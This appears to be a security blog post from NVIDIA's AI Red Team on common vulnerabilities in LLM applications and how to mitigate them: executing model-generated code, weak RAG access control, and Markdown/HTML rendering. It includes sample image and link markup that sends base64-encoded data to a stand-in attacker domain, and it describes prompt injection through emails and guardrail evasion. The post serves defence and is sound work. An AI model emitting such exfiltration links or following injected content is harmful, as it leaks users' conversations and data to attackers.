Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.
In this blog, we share key findings from those assessments and how to mitigate the most significant risks.
Common findings
Vulnerability 1: Executing LLM-generated code can lead to remote code execution
One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. Developers often use these functions to generate plots, and the pattern is sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.
The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.
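As a minimal sketch of the vulnerable shape (the llm_generate helper below is a hypothetical stand-in for a real model call, not any particular SDK), the pattern often looks like this:

import contextlib
import io

def llm_generate(prompt: str) -> str:
    # Stand-in for a real model call; imagine Python source coming back.
    return 'print("pretend this is model-generated plotting code")'

def run_llm_code(user_request: str) -> str:
    generated = llm_generate(f"Write Python to satisfy: {user_request}")
    # DO NOT do this: exec runs whatever the model produced, so any prompt
    # injection that reaches the model reaches the interpreter as well.
    buffer = io.StringIO()
    with contextlib.redirect_stdout(buffer):
        exec(generated)
    return buffer.getvalue()

print(run_llm_code("plot monthly sales"))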

The fix here is clear: avoid using exec, eval, or similar constructs—especially on LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval is nested deep within a library and potentially protected by guardrails, an attacker can wrap their malicious command in layers of evasion and obfuscation.
In Figure 1, a prompt injection gains RCE by wrapping the final payload (pink) in guardrail evasions (shown in green) and in prompt engineering that works around the system prompts introduced by calls within the library (blue and orange).
Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.
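One way to apply that pattern, as a sketch: prompt the model to answer with a structured “function call” instead of raw code, then route it through an explicit allowlist (the function names and JSON shape here are illustrative, not a specific framework’s API).

import json

# Explicitly permitted operations; the model can only choose among these.
def total(values):
    return sum(values)

def average(values):
    return sum(values) / len(values) if values else 0.0

ALLOWED_FUNCTIONS = {"total": total, "average": average}

def dispatch(llm_response: str):
    # Parse the model's structured intent and map it to a permitted function;
    # anything that doesn't match the allowlist is rejected, never executed.
    try:
        call = json.loads(llm_response)
        func = ALLOWED_FUNCTIONS[call["function"]]
        args = list(call.get("arguments", []))
    except (json.JSONDecodeError, KeyError, TypeError):
        raise ValueError("not a recognized, permitted function call")
    return func(args)

# The model was instructed to answer with JSON such as:
print(dispatch('{"function": "average", "arguments": [3, 5, 10]}'))  # 6.0

If the application truly does need to run model-generated code, that execution should still happen inside an isolated sandbox, never in the application process.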
Vulnerability 2: Insecure access control in retrieval-augmented generation data sources
Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:
First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn’t be able to see. We commonly see this happen in the following ways.
- The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven’t been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
- The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the original source of the documents.
- Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.
Reviewing how delegated authorization to the document or data sources is managed can help catch this issue early, so teams can design around it.
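A minimal sketch of that check at retrieval time, assuming each chunk is stored with the ACL of its source document (the field names and the toy relevance score are illustrative, standing in for a real vector search):

from dataclasses import dataclass, field

@dataclass
class Chunk:
    text: str
    # Principals (users or groups) permitted to read the source document,
    # copied from the source system's ACLs at ingestion time.
    allowed_principals: set = field(default_factory=set)

def relevance(query: str, text: str) -> int:
    # Toy word-overlap score standing in for the real similarity search.
    return len(set(query.lower().split()) & set(text.lower().split()))

def retrieve_for_user(query: str, user_principals: set, index: list, k: int = 3):
    # Drop chunks the caller cannot read *before* ranking and prompting,
    # so unauthorized content never reaches the augmented prompt.
    permitted = [c for c in index if c.allowed_principals & user_principals]
    return sorted(permitted, key=lambda c: relevance(query, c.text), reverse=True)[:k]

Whether this filter lives in the application or is pushed down into the vector database as a metadata filter, the important property is that read permissions are evaluated against the calling user at query time, not against the over-permissioned service account used for ingestion.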
The other serious vulnerability we commonly see is broad access to write to the RAG data store. For instance, if a user’s emails are part of the data in the retrieval phase of a RAG pipeline, anyone who knows this can send that user an email and have its content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user’s personal documents or data.
Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.
In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach. In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.
Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.
Vulnerability 3: Active content rendering of LLM outputs
The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.
If content is appended to a link or image URL that directs the user’s browser to an attacker’s server, that content will appear in the logs of the attacker’s server when the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker’s domain to fetch the image data, and that same network call can carry encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user’s conversation history into such a link, leading to data exfiltration.
<div class="markdown-body">
<p>
<img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvcmQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">
</p>
<h3>Sources</h3>
</div>

Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.
<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w" href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp" node="[object Object]" target="_blank">click here to learn more!</a>

To mitigate this vulnerability, we recommend one or more of the following (a brief sketch of the first and third items follows the list):
- Use image content security policies that only allow images to be loaded from a predetermined list of “safe” sites. This prevents the user’s browser from rendering images automatically from an attacker’s servers.
- For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be “inactive,” requiring a copy-paste operation to access the domain.
- Sanitize all LLM output to remove Markdown, HTML, URLs, or other potentially active content that the model generates dynamically.
- As a last resort, disable active content entirely within the user interface.
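The sketch below illustrates the first and third items, assuming a Flask-served chat UI (the allowed image origin is illustrative): the response header tells the browser to refuse image loads from any other domain, and a crude regex strips Markdown image syntax from model output before it reaches the renderer.

import re
from flask import Flask

app = Flask(__name__)

# Only these origins may serve images rendered in the chat UI.
ALLOWED_IMAGE_ORIGINS = "'self' https://assets.example.com"

@app.after_request
def add_csp(response):
    # The browser will not fetch <img> sources from other domains, so an
    # injected image URL cannot carry encoded data to an attacker's server.
    response.headers["Content-Security-Policy"] = f"img-src {ALLOWED_IMAGE_ORIGINS}"
    return response

MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_images(llm_output: str) -> str:
    # Remove Markdown image syntax entirely before rendering model output.
    return MARKDOWN_IMAGE.sub("[image removed]", llm_output)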
Conclusion
The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them. Our top three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these vulnerabilities, you can secure your LLM implementation against the most common and impactful vulnerabilities.
If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.